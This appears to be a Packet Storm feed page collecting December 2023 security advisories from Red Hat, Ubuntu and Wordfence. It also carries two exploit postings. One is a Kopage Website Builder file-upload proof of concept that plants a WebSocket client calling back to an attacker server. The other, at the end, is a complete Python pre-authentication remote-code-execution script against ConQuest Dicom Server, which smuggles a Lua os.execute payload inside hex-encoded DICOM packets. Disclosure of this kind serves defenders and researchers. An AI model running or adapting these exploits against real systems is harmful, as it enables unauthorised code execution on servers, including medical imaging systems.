Red Hat Security Advisory 2023-7623-03 - Red Hat JBoss Web Server 5.7.7 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include denial of service and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7623.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Web Server 5.7.7 release and security updateAdvisory ID:        RHSA-2023:7623-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7623Issue date:         2023-12-07Revision:           03CVE Names:          CVE-2023-0464====================================================================Summary: Red Hat JBoss Web Server 5.7.7 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.7 serves as a replacement for Red Hat JBoss Web Server 5.7.6. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* jbcs-httpd24-openssl: OpenSSL: Excessive time spent checking DH q parametervalue (CVE-2023-3817)* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)* openssl: Certificate policy check not enabled (CVE-2023-0466)* openssl: Invalid certificate policies in leaf certificates are silentlyignored (CVE-2023-0465)* openssl: Denial of service by excessive resource usage in verifying X509policy constraints (CVE-2023-0464)* tomcat: FileUpload: DoS due to accumulation of temporary files on Windows(CVE-2023-42794)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* openssl: Possible DoS translating ASN.1 object identifiers (CVE-2023-2650)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-0464References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2181082https://bugzilla.redhat.com/show_bug.cgi?id=2182561https://bugzilla.redhat.com/show_bug.cgi?id=2182565https://bugzilla.redhat.com/show_bug.cgi?id=2207947https://bugzilla.redhat.com/show_bug.cgi?id=2224962https://bugzilla.redhat.com/show_bug.cgi?id=2227852https://bugzilla.redhat.com/show_bug.cgi?id=2235370

Red Hat Security Advisory 2023-7623-03

Red Hat Security Advisory 2023-7622-03 - An update is now available for Red Hat JBoss Web Server 5.7.7 on Red Hat Enterprise Linux versions 7, 8, and 9. Issues addressed include denial of service and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7622.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Web Server 5.7.7 release and security updateAdvisory ID:        RHSA-2023:7622-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7622Issue date:         2023-12-07Revision:           03CVE Names:          CVE-2023-0464====================================================================Summary: An update is now available for Red Hat JBoss Web Server 5.7.7 on Red Hat Enterprise Linux versions 7, 8, and 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.7 serves as a replacement for Red Hat JBoss Web Server 5.7.6. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* jbcs-httpd24-openssl: OpenSSL: Excessive time spent checking DH q parameter value (CVE-2023-3817)* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)* openssl: Certificate policy check not enabled (CVE-2023-0466)* openssl: Invalid certificate policies in leaf certificates are silently ignored (CVE-2023-0465)* openssl: Denial of service by excessive resource usage in verifying X509 policy constraints (CVE-2023-0464)* openssl: Possible DoS translating ASN.1 object identifiers (CVE-2023-2650)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-0464References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2181082https://bugzilla.redhat.com/show_bug.cgi?id=2182561https://bugzilla.redhat.com/show_bug.cgi?id=2182565https://bugzilla.redhat.com/show_bug.cgi?id=2207947https://bugzilla.redhat.com/show_bug.cgi?id=2224962https://bugzilla.redhat.com/show_bug.cgi?id=2227852https://bugzilla.redhat.com/show_bug.cgi?id=2235370

Red Hat Security Advisory 2023-7622-03

Ubuntu Security Notice 6541-1 - It was discovered that the GNU C Library was not properly handling certain memory operations. An attacker could possibly use this issue to cause a denial of service. It was discovered that the GNU C library was not properly implementing a fix for CVE-2023-4806 in certain cases, which could lead to a memory leak. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 23.04.

==========================================================================  
Ubuntu Security Notice USN-6541-1  
December 07, 2023

glibc vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in GNU C Library.

Software Description:  
- glibc: GNU C Library

Details:

It was discovered that the GNU C Library was not properly handling certain  
memory operations. An attacker could possibly use this issue to cause a  
denial of service (application crash). (CVE-2023-4806, CVE-2023-4813)

It was discovered that the GNU C library was not properly implementing a  
fix for CVE-2023-4806 in certain cases, which could lead to a memory leak.  
An attacker could possibly use this issue to cause a denial of service  
(application crash). This issue only affected Ubuntu 23.04. (CVE-2023-5156)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
libc-bin 2.37-0ubuntu2.2  
libc6 2.37-0ubuntu2.2

Ubuntu 22.04 LTS:  
libc-bin 2.35-0ubuntu3.5  
libc6 2.35-0ubuntu3.5

Ubuntu 20.04 LTS:  
libc-bin 2.31-0ubuntu9.14  
libc6 2.31-0ubuntu9.14

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
libc-bin 2.27-3ubuntu1.6+esm1  
libc6 2.27-3ubuntu1.6+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
libc-bin 2.23-0ubuntu11.3+esm5  
libc6 2.23-0ubuntu11.3+esm5

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6541-1  
CVE-2023-4806, CVE-2023-4813, CVE-2023-5156

Package Information:  
https://launchpad.net/ubuntu/+source/glibc/2.37-0ubuntu2.2  
https://launchpad.net/ubuntu/+source/glibc/2.35-0ubuntu3.5  
https://launchpad.net/ubuntu/+source/glibc/2.31-0ubuntu9.14

Ubuntu Security Notice USN-6541-1

Ubuntu Security Notice 6522-2 - USN-6522-1 fixed several vulnerabilities in FreeRDP. This update provides the corresponding update for Ubuntu 18.04 LTS. It was discovered that FreeRDP incorrectly handled drive redirection. If a user were tricked into connection to a malicious server, a remote attacker could use this issue to cause FreeRDP to crash, resulting in a denial of service, or possibly obtain sensitive information. It was discovered that FreeRDP incorrectly handled certain surface updates. A remote attacker could use this issue to cause FreeRDP to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6522-2December 07, 2023freerdp2 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in FreeRDP.Software Description:- freerdp2: RDP client for Windows Terminal ServicesDetails:USN-6522-1 fixed several vulnerabilities in FreeRDP. This update providesthe corresponding update for Ubuntu 18.04 LTS.Original advisory details: It was discovered that FreeRDP incorrectly handled drive redirection. If a user were tricked into connection to a malicious server, a remote attacker could use this issue to cause FreeRDP to crash, resulting in a denial of service, or possibly obtain sensitive information. (CVE-2022-41877)  It was discovered that FreeRDP incorrectly handled certain surface updates. A remote attacker could use this issue to cause FreeRDP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2023-39352, CVE-2023-39356)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS (Available with Ubuntu Pro):  libfreerdp2-2                   2.2.0+dfsg1-0ubuntu0.18.04.4+esm2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6522-2  https://ubuntu.com/security/notices/USN-6522-1  CVE-2022-41877, CVE-2023-39352, CVE-2023-39356

Ubuntu Security Notice USN-6522-2

WordPress Elementor plugin versions 3.18.1 and below are vulnerability to remote code execution via file upload in the template import functionality.

    Vulnerability Summary from Wordfence IntelligenceDescription: Elementor <= 3.18.1 Authenticated(Contributor+) Arbitrary File Upload to Remote Code Execution via Template Import Affected Plugin: ElementorPlugin Slug: elementorAffected Versions: <= 3.18.1CVE ID: CVE-2023-48777Pending CVSS Score: 8.8 (Highl)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HResearcher/s: Hồng Quân Fully Patched Version: 3.18.2The Elementor Website Builder plugin for WordPress is vulnerable to Remote Code Execution via file upload in all versions up to and including 3.18.1 via the template import functionality. This makes it possible for authenticated attackers, with contributor-level access and above, to upload files and execute code on the server. Technical Analysis The source of the issue is the handle_elementor_upload function called by the import_template Elementor AJAX function, which is accessible to Contributor-level users and above. Although it uses file type validation, vulnerable versions first save the uploaded file to a temporary directory before checking the file type, and do not delete the temporary file if it fails this validation:public function handle_elementor_upload( array $file, $allowed_file_extensions = null{// If $file['fileData'] is set, it signals that the passed file is a Base64 string that needs to be decoded and// saved to a temporary file.if ( isset( $file['fileData']) {$file = $this->save_base64_to_tmp_file( $file );}$validation_result = $this->validate_file( $file, $allowed_file_extensions );if ( is_wp_error( $validation_result) {return $validation_result;}return $file;}This means that contributors with access to the Elementor editor could upload files of any type and they will be saved in a temporary directory with a randomized name. While attackers exploiting versions before 3.18.1 could use directory traversal to move the uploaded file into a more predictable location, the 3.18.1 partial patch sanitized the filename, meaning that it could only be uploaded directly to the temporary directory.Since the exploit returns a 500 error and provides no feedback on the location of the temporary directory, attackers would have difficulty finding the uploaded file unless directory indexing was enabled on the server, which is no longer common due to the many security risks it presents.ConclusionIn today's PSA, we covered a file upload vulnerability in Elementor affecting versions 3.18.1 and earlier. We strongly recommend updating to the latest version of Elementor, which is 3.18.2 as of this writing, as soon as possible, as this is a high-severity vulnerability which can be used by attackers to upload files and take control of a site.All Wordfence users, including those running Wordfence Premium , Wordfence Care , and Wordfence Response,  are fully protected against this vulnerability.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.Did you know that Wordfence has a Bug Bounty Program ? We’ve recently increased our bounties by 6.25x until December 20th, 2023, with our bounties for the most critical vulnerabilities reaching $10,000 USD! If you’re an aspiring or current vulnerability researcher, click here to sign up.

WordPress Elementor 3.18.1 File Upload / Remote Code Execution

Kopage Website Builder version 4.4.15 appears to suffer from a remote shell upload vulnerability.

    ## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE## Author: nu11secur1ty## Date: 12/08/2023## Vendor: https://www.kopage.com/## Software: https://demo.kopage.com/index.php## Reference: https://portswigger.net/web-security/file-upload,https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload## Description:The file upload function suffers from file upload vulnerability, thereis no strong sanitizing function for uploading some extension files.In this case, I uploaded an HTML web socket client on their server andthen I connected this client with my javascript server =)Depending on the scenario, this can be the end of privacy and evenworse than ever!I am a Penetration Tester, not a stupid cracker! Thank you all!STATUS: CRITICAL Vulnerability[+]Exploit client:```POST<html>  <script>(() => {  const ws = new WebSocket('ws://0.0.0.0:8080')  ws.onopen = () => {    console.log('ws opened on browser')    ws.send('hello world you are hacked :D')  }  ws.onmessage = (message) => {    console.log(`message received ${message}`)  }})() </script></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kopage.com/Kopage-Website-Builder-4.4.15)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/12/kopage-website-builder-4415-file-upload.html)## Time spent:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Kopage Website Builder 4.4.15 Shell Upload

The Microsoft Windows Kernel has a time-of-check / time-of-use issue in verifying layered key security which may lead to information disclosure from privileged registry keys.

Windows Kernel Information Disclosure

Arm Mali CSF has a refcount overflow bugfix in r43p0 that was misclassified as a memory leak fix.

Arm Mali CSF Overflow / Use-After-Free

Ubuntu Security Notice 6540-1 - It was discovered that BlueZ did not properly restrict non-bonded devices from injecting HID events into the input subsystem. This could allow a physically proximate attacker to inject keystrokes and execute arbitrary commands whilst the device is discoverable.

==========================================================================  
Ubuntu Security Notice USN-6540-1  
December 07, 2023

bluez vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

BlueZ could be made to give a physically proximate attacker keyboard and  
mouse control of a computer.

Software Description:  
- bluez: Bluetooth tools and daemons

Details:

It was discovered that BlueZ did not properly restrict non-bonded devices  
from injecting HID events into the input subsystem. This could allow a  
physically proximate attacker to inject keystrokes and execute arbitrary  
commands whilst the device is discoverable.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   bluez                           5.68-0ubuntu1.1  
   libbluetooth3                   5.68-0ubuntu1.1

Ubuntu 23.04:  
   bluez                           5.66-0ubuntu1.1  
   libbluetooth3                   5.66-0ubuntu1.1

Ubuntu 22.04 LTS:  
   bluez                           5.64-0ubuntu1.1  
   libbluetooth3                   5.64-0ubuntu1.1

Ubuntu 20.04 LTS:  
   bluez                           5.53-0ubuntu3.7  
   libbluetooth3                   5.53-0ubuntu3.7

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   bluez                           5.48-0ubuntu3.9+esm1  
   libbluetooth3                   5.48-0ubuntu3.9+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   bluez                           5.37-0ubuntu5.3+esm3  
   libbluetooth3                   5.37-0ubuntu5.3+esm3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6540-1  
   CVE-2023-45866

Package Information:  
   https://launchpad.net/ubuntu/+source/bluez/5.68-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/bluez/5.66-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/bluez/5.64-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/bluez/5.53-0ubuntu3.7

Ubuntu Security Notice USN-6540-1

Conquest Dicom Server version 1.5.0d pre-authentication remote command execution exploit.

#!/usr/bin/env python3  
# ---------------------------------------------------------  
# preauth rce poc for ConQuest Dicom Server (1.5.0d)  
# ---------------------------------------------------------  
# 04.08.2023 @ 22:07   
#   
#   code610 blogspot com  
# 

import socket

target = '192.168.56.106'  
rport = 5678

pkt1 =  b"\x01\x00\x00\x00\x00\xd0\x00\x01\x00\x00\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31"  
pkt1 += b"\x20\x20\x20\x20\x20\x20\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x20\x20\x20\x20"  
pkt1 += b"\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
pkt1 += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
pkt1 += b"\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e\x31"  
pkt1 += b"\x20\x00\x00\x2e\xcb\x00\x00\x00\x30\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31"  
pkt1 += b"\x40\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x32"  
pkt1 += b"\x50\x00\x00\x3d"  
pkt1 += b"\x51\x00\x00\x04\x00\x00\x80\x00"  
pkt1 += b"\x52\x00\x00\x22\x31\x2e\x32\x2e\x38\x32\x36\x2e\x30\x2e\x31\x2e\x33\x36\x38\x30\x30\x34\x33\x2e\x32\x2e\x31\x33\x35\x2e\x31\x30\x36\x36\x2e\x31\x30\x31"  
pkt1 += b"\x55\x00\x00\x0b\x31\x2e\x35\x2e\x30\x2f\x57\x49\x4e\x33\x32"

pkt2 = b"\x04\x00\x00\x00\x04\x92\x00\x00\x04\x8e\xcb\x03\x00\x00\x00\x00\x04\x00\x00\x00\x38\x00\x00\x00"  
pkt2 += b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e"  
pkt2 += b"\x31\x00\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00\x00\x00\x10\x01\x02\x00\x00\x00\x07\x00\x00\x00"  
pkt2 += b"\x00\x08\x02\x00\x00\x00\x01\x01\x99\x99\x00\x04\x40\x04\x00\x00\x6c\x75\x61\x3a\x6c\x6f\x63\x61"  
pkt2 += b"\x6c\x20\x66\x69\x72\x73\x74\x3d\x74\x72\x75\x65\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x61\x65\x3d\x5b"  
pkt2 += b"\x5b\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x6c\x65\x76\x65"  
pkt2 += b"\x6c\x3d\x5b\x5b\x50\x41\x54\x49\x45\x4e\x54\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x3d\x7b\x51"  
pkt2 += b"\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x5b\x5b\x50\x41\x54\x49"  
pkt2 += b"\x45\x4e\x54\x5d\x5d\x2c\x50\x61\x74\x69\x65\x6e\x74\x49\x44\x3d\x5b\x5b\x5d\x5d\x2c\x50\x61\x74"  
pkt2 += b"\x69\x65\x6e\x74\x4e\x61\x6d\x65\x3d\x5b\x5b"

# super evil command  
# rce payload: aaaa]],};local t=os.execute("calc");local z{[[  
pkt3 = b""  
pkt3 += b"\x61\x61\x61\x61\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x74\x3d\x6f\x73\x2e\x65\x78\x65\x63"  
pkt3 += b"\x75\x74\x65\x28\x22\x63\x61\x6c\x63\x22\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x20\x41\x3d\x7b\x5b\x5b\x41\x42"

pkt4 = b"\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x32\x3d\x44\x69\x63\x6f\x6d\x4f\x62\x6a\x65\x63\x74\x3a\x6e\x65\x77\x28\x29\x3b"  
pkt4 += b"\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x71\x29\x20\x64\x6f\x20\x71\x32\x5b\x6b\x5d\x3d\x76\x20"  
pkt4 += b"\x65\x6e\x64\x3b\x6c\x6f\x63\x61\x6c\x20\x72\x32\x3d\x64\x69\x63\x6f\x6d\x71\x75\x65\x72\x79\x28\x61\x65\x2c\x20\x6c\x65\x76\x65"  
pkt4 += b"\x6c\x2c\x20\x71\x32\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x73\x3d\x74\x65\x6d\x70\x66\x69\x6c\x65\x28\x22\x74\x78\x74\x22\x29\x20\x66"  
pkt4 += b"\x3d\x69\x6f\x2e\x6f\x70\x65\x6e\x28\x73\x2c\x20\x22\x77\x62\x22\x29\x3b\x69\x66\x20\x72\x32\x3d\x3d\x6e\x69\x6c\x20\x74\x68\x65"  
pkt4 += b"\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x6e\x6f\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68\x20\x22\x2e"  
pkt4 += b"\x2e\x61\x65\x2e\x2e\x22\x5c\x6e\x22\x29\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28"  
pkt4 += b"\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x65\x6e\x64\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x72\x20\x3d\x20\x6c\x6f\x61\x64\x73\x74\x72\x69"  
pkt4 += b"\x6e\x67\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x22\x2e\x2e\x72\x32\x3a\x53\x65\x72\x69\x61\x6c\x69\x7a\x65\x28\x29\x29\x28\x29\x3b"  
pkt4 += b"\x72\x5b\x31\x5d\x2e\x51\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x6e\x69\x6c\x3b\x20\x72\x5b\x31"  
pkt4 += b"\x5d\x2e\x54\x72\x61\x6e\x73\x66\x65\x72\x53\x79\x6e\x74\x61\x78\x55\x49\x44\x3d\x6e\x69\x6c\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x6b"  
pkt4 += b"\x65\x79\x73\x3d\x7b\x7d\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x72\x5b\x31\x5d\x29\x20\x64\x6f"

pkt5 = b""  
pkt5 += b"\x20\x69\x66\x20\x74\x79\x70\x65\x28\x76\x29\x7e\x3d\x22\x74\x61\x62\x6c\x65\x22\x20\x74\x68\x65\x6e\x20\x6b\x65\x79\x73\x5b\x23"  
pkt5 += b"\x6b\x65\x79\x73\x2b\x31\x5d\x3d\x6b\x20\x65\x6e\x64\x20\x65\x6e\x64\x3b\x20\x74\x61\x62\x6c\x65\x2e\x73\x6f\x72\x74\x28\x6b\x65"  
pkt5 += b"\x79\x73\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x61\x2c\x20\x62\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x73\x74\x72\x69\x6e\x67"  
pkt5 += b"\x2e\x73\x75\x62\x28\x61\x2c\x20\x31\x2c\x20\x37\x29\x3c\x73\x74\x72\x69\x6e\x67\x2e\x73\x75\x62\x28\x62\x2c\x20\x31\x2c\x20\x37"  
pkt5 += b"\x29\x20\x65\x6e\x64\x29\x3b\x20\x69\x66\x20\x66\x69\x72\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e"  
pkt5 += b"\x20\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x76\x2e\x2e\x22\x20\x20\x20"  
pkt5 += b"\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x69\x66\x20\x66\x69\x72"  
pkt5 += b"\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x66\x6f\x72\x20\x6b\x2c\x76"  
pkt5 += b"\x20\x69\x6e\x20\x69\x70\x61\x69\x72\x73\x28\x72\x29\x20\x64\x6f\x20\x20\x20\x66\x6f\x72\x20\x6b\x32\x2c\x76\x32\x20\x69\x6e\x20"  
pkt5 += b"\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5b\x22\x2e\x2e\x76\x5b\x76"  
pkt5 += b"\x32\x5d\x2e\x2e\x22\x5d\x20\x20\x20\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65"  
pkt5 += b"\x6e\x64\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28\x29\x3b"

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:  
    print("+ connecting to target...")  
    s.connect(( target, rport ))  
    print("+ connected!")

    print("+ sending pkt1...")  
    #s.sendall( pkt1 )   
    #data1 = s.recv(1024)  
    #print("+ recv pkt1:\n%s" % data1)

    #print("Data received:\n%s" % data1 )

    print("+ sending 2nd and more pkts...")  
    #s.sendall( pkt2 )   
    #s.sendall( pkt3 )   
    #s.sendall( pkt3 )   
    #s.sendall( pkt5 ) 

    allpkts = pkt1 + pkt2 + pkt3 + pkt4 + pkt5  
    s.sendall(allpkts)

    print("! should be done :|")

Source

Packet Storm